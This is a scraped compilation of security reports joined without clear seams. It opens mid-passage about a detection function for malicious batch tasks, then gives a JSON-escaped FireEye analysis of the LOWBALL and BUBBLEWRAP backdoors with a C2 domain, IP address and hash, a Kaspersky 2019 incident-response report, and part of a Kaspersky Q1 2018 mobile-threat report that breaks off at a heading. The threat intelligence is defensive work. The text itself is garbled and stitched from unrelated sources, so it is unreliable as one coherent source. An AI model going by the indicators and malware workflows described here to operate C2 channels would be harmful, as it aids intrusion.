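Run against the samples it flags both tasks (five discovery commands appending to %temp%\download plus the self-delete in the first; the renamed and started %temp%\upload in the second) and leaves the constructed admin script alone, because a single redirected ipconfig is everyday administration. The same function works on scripts captured by an EDR's file-creation telemetry; only the script text matters.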
This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\n| MD5 | CnC domain | IP address |\n|---|---|---|\n| 0beb957923df2c885d29a9c1743dd94b | accounts.serveftp[.]com | 59.188.0.197 |\n\nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. 
The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and which almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files of 0-4 bytes that dictate how often the malware checks in with the CnC\n\nThe threat actor then downloads the results and deletes the files from the cloud storage account.\n\n### Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first-stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second-stage malware after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. 
HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group.\n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. \u201cPoison Ivy: Assessing Damage and Extracting Intelligence.\u201d\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. South China Morning Post. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EJ Insight. 31 August 2015. 
http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "cvss3": {}, "published": "2015-12-01T08:00:00", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2015-12-01T08:00:00", "id": "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. 
The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. 
Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims' environments, including exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. The most common, however, were exploitation of unpatched vulnerabilities and malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. 
Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. 
More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story "[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)".\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. 
The distribution also shows that 100% of the cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware only once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0-day and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not exposing management interfaces to the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nLinking the popular initial compromise vectors with how an incident was detected shows that incidents detected through a suspicious file mostly started with a malicious email, while cases detected only after files had been encrypted mostly followed brute-force or vulnerability exploitation attacks. \nSometimes we act as complementary experts alongside a primary incident response team from the victim's organization and have no visibility into all of their findings \u2013 hence the 'Unknown reasons' on the charts. 
Malicious emails are the vector most likely to be detected by a variety of security toolstacks, but the chart does not show the split between 0-day and 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nSetting how long an attack went unnoticed against how the organization was compromised shows that cases that began with vulnerability exploitation on the organization's network perimeter went unnoticed for longest, while social engineering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools that cannot simply be detected as malicious utilities, because the same tools are used in everyday administration. Suspicious events that blend in with normal activity can only be identified by deep analysis of the attack that connects the use of such tools to the incident. The most used tools were PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. 
PowerShell can be used for virtually any task.\n\nWeighting these tools by how often they occurred in incidents also shows the tactics (MITRE ATT&CK) in which they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the exploits identified in incident cases appeared in 2019, alongside a well-known remote code execution vulnerability in the Windows SMB service (MS17-010) that was still being actively exploited by a large number of adversaries:\n\n * **MS17-010** (SMB service in Microsoft Windows): remote code execution vulnerability used in several large attacks such as WannaCry, NotPetya and WannaMine.\n * **CVE-2019-0604** (Microsoft SharePoint): remote code execution vulnerability that lets adversaries execute arbitrary code in SharePoint without authentication.\n * **CVE-2019-19781** (Citrix Application Delivery Controller and Citrix Gateway): unauthenticated remote code execution on all hosts connected to the Citrix infrastructure.\n * **CVE-2019-0708** (RDP service in Microsoft Windows): remote code execution vulnerability (codename BlueKeep) in a very widespread and, unfortunately, frequently internet-exposed RDP service.\n * **CVE-2018-7600** (Drupal): remote code execution vulnerability also known as Drupalgeddon2, widely used to install backdoors, web miners and other malware on compromised web servers.\n * **CVE-2019-11510** (Pulse Secure SSL VPN): unauthenticated retrieval of VPN server user credentials, giving instant access to the victim organization through a legitimate channel.\n\n## Attack duration\n\nFor a number of incidents, Kaspersky specialists established the time period between the beginning of an adversary's activity and the end of the attack. 
As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n| | **Rush (hours or days)** | **Average (weeks)** | **Long-lasting (months or longer)** |\n|---|---|---|---|\n| Description | Attacks lasting up to a week, mainly ransomware incidents. Because they unfold so fast, effective counteraction is possible only through preventive measures. In some cases a delay of up to a week was observed between the initial compromise and the start of the adversary's activity. | Attacks that developed over one or several weeks, in most cases aimed at the direct theft of money. Typically the adversaries achieved their goals within a week. | Incidents that lasted more than a month, almost always aimed at stealing sensitive data. Such attacks alternate active and passive phases; the total duration of the active phases is on average close to the duration of attacks in the previous group. |\n| Common threat | Ransomware infection | Financial theft | Cyber-espionage and theft of confidential data |\n| Common attack vectors | Downloading a malicious file via a link in an email; downloading a malicious file from an infected site; exploitation of vulnerabilities on the network perimeter; credential brute-force attack | Downloading a malicious file via a link in an email; exploitation of vulnerabilities on the network perimeter | Exploitation of vulnerabilities on the network perimeter |\n| Attack duration (median) | 1 day | 10 days | 122 days |\n| Incident response duration | Hours to days | Weeks | Weeks |\n\n## Operational metrics\n\n### False positive rate\n\nFalse positives in incident response are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization has no threat hunting specialist of its own, or that it is served by an external SOC that lacks the full context for the event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time it takes an organization to detect an incident after the attack starts. Detecting the attack within the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still acceptable, but months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 
70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&CK tactics and techniques**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. 
This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.

Adversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.

Applying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs at the endpoint and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.

_Source: "Incident Response Analyst Report 2019", Securelist, published 2020-08-06, https://securelist.com/incident-response-analyst-report-2019/97974/_

## Q1 figures

According to KSN:

 * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
 * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
 * Ransomware attacks were registered on the computers of 179,934 unique users.
 * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.
 * Kaspersky Lab
products for mobile devices detected:
   * 1,322,578 malicious installation packages
   * 18,912 installation packages for mobile banking Trojans
   * 8,787 installation packages for mobile ransomware Trojans

## Mobile threats

### Q1 events

In Q1 2018, DNS hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).

_This malicious resource shows a fake window while displaying the legitimate site in the address bar_

It wasn't a [drive-by download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.

However, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.

Some backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats.
All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.

### Mobile threat statistics

In Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.

_Number of detected malicious installation packages, Q2 2017 – Q1 2018_

#### Distribution of detected mobile apps by type

_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018_

Among all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.

Second place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.

Advertising apps, which ranked second in Q4 2017, dropped a place—their share decreased by 8%, accounting for 11% of all detected threats.

On a separate note, Q1 saw a rise in the share of mobile banking threats.
This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.

#### TOP 20 mobile malware

_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._

| | Verdict | %* |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 70.17 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 12.92 |
| 3 | Trojan.AndroidOS.Agent.rx | 5.55 |
| 4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 |
| 5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 |
| 6 | Trojan.AndroidOS.Triada.dl | 2.94 |
| 7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 |
| 8 | Trojan.AndroidOS.Piom.rfw | 2.13 |
| 9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 |
| 10 | Trojan.AndroidOS.Piom.pnl | 1.78 |
| 11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 |
| 12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 |
| 13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 |
| 14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 |
| 15 | Trojan.AndroidOS.Piom.qmx | 1.47 |
| 16 | Trojan.AndroidOS.Dvmap.a | 1.40 |
| 17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 |
| 18 | Trojan.AndroidOS.Triada.snt | 1.24 |
| 19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 |
| 20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 |

_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._

As before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (12.92%).
This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

Third was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.

Fourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.

Sixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in "clean" apps.

The Trojan ransomware Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion.
Like other such mobile ransomware, the malware is distributed under the guise of a porn app.

Another interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom, in fine print, it is written that the services are fee-based and that subscription to them is via SMS.

#### Geography of mobile threats

_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_

TOP 10 countries by share of users attacked by mobile malware:

| | Country* | %** |
|---|---|---|
| 1 | China | 34.43 |
| 2 | Bangladesh | 27.53 |
| 3 | Nepal | 27.37 |
| 4 | Ivory Coast | 27.16 |
| 5 | Nigeria | 25.36 |
| 6 | Algeria | 24.13 |
| 7 | Tanzania | 23.61 |
| 8 | India | 23.27 |
| 9 | Indonesia | 22.01 |
| 10 | Kenya | 21.45 |

_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._
_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: it came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%).
The biggest climber was Nepal (27.37%), rising from ninth place last year to third.

Russia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).

The safest countries (based on the proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).

#### Mobile banking Trojans

In the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.

_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 – Q1 2018_

| | Verdict | %* |
|---|---|---|
| 1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 |
| 2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 |
| 3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 |
| 4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 |
| 5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 |
| 6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 |
| 7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 |
| 8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 |
| 9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 |
| 10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 |

_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._

The most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.

Note that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list.
This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.

_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_

**TOP 10 countries by share of users attacked by mobile banking Trojans**

| | Country* | %** |
|---|---|---|
| 1 | Russia | 0.74 |
| 2 | USA | 0.65 |
| 3 | Tajikistan | 0.31 |
| 4 | Uzbekistan | 0.30 |
| 5 | China | 0.26 |
| 6 | Turkey | 0.22 |
| 7 | Ukraine | 0.22 |
| 8 | Kazakhstan | 0.22 |
| 9 | Poland | 0.17 |
| 10 | Moldova | 0.16 |

_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._
_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._

The Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.

The US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well as Trojan-Banker.AndroidOS.Faketoken.z.

#### Mobile ransomware Trojans

In Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload.
As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a "banker."

_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 – Q1 2018)_

Note that despite the decline in their total number, ransomware Trojans remain a serious threat — technically they are now far more advanced and dangerous. For instance, Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove those rights. If no PIN is set (this could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset it to factory settings.

The most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a — it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt.
Incidentally, Egat.d is a pared-down version of Zebt.a; both have the same creators.

_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_

TOP 10 countries by share of users attacked by mobile ransomware Trojans:

| | Country* | %** |
|---|---|---|
| 1 | Kazakhstan | 0.99 |
| 2 | Italy | 0.64 |
| 3 | Ireland | 0.63 |
| 4 | Poland | 0.61 |
| 5 | Belgium | 0.56 |
| 6 | Austria | 0.38 |
| 7 | Romania | 0.37 |
| 8 | Hungary | 0.34 |
| 9 | Germany | 0.33 |
| 10 | Switzerland | 0.29 |

_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000)._
_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

First place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).

## Vulnerable apps used by cybercriminals

